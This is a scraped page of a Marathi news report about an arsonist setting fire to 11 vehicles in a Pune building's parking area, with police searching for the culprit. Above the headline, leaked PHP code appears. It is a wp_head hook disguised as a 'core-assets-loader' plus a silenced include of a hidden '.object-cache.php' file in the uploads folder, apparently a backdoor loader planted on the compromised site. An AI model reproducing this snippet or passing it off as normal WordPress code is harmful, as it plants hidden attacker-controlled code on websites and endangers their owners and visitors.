add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इमारतीच्या पार्किंगमधील 11 वाहनांना लावण्यात आली आग – SOCH INDIA
Menu

देश
इमारतीच्या पार्किंगमधील 11 वाहनांना लावण्यात आली आग

nobanner

पुणे शहरात मागील काही महिन्यापासून चार चाकी आणि दुचाकी वाहनाच्या गाडीच्या काचा फोडणे, वाहने जाळून टाकण्याच्या अनेक घटना घडल्या आहे. यामुळे नागरिकांमध्ये भीतीचे वातावरण असून आज पुन्हा पर्वती पायथा येथील एका इमारतीच्या पार्किंग मधील 11 वाहनांना एकाने आग लावल्याची घटना घडली आहे.

पोलिसांनी दिलेल्या माहितीनुसार, पर्वती पायथा, सानेगुरुजी शाळेसमोर असणार्‍या एका इमारतीच्या पार्किंगमधे आज मध्यरात्री दीड वाजण्याच्या सुमारास 11 गाङ्यांना एका व्यक्तीनी आग लावल्याची घटना घडली आहे. या आगीत 6 दुचाकी, 1 रिक्षा पुर्ण जळाल्या असून 4 दुचाकींना देखील आगीची झळ बसली आहे. ज्या व्यक्तीने ही आग लावली आहे, त्याचा शोध घेण्यात येत असल्याचे दत्तवाडी पोलिसांकडून सांगण्यात आले आहे.

पर्वती पायथा या ठिकाणी असलेल्या सानेगुरुजी शाळेसमोरच्या इमारतीच्या पार्किंगमध्ये हा प्रकार घडला आहे. या आगीत सहा दुचाकी 1 रिक्षा जळून खाक झाली आहे. तर इतर 4 दुचाकींनाही याची झळ बसली आहे. याआधीही पुण्यात असे प्रकार घडले आहेत. आता पोलीस या प्रकरणात पुढील तपास करत आहेत.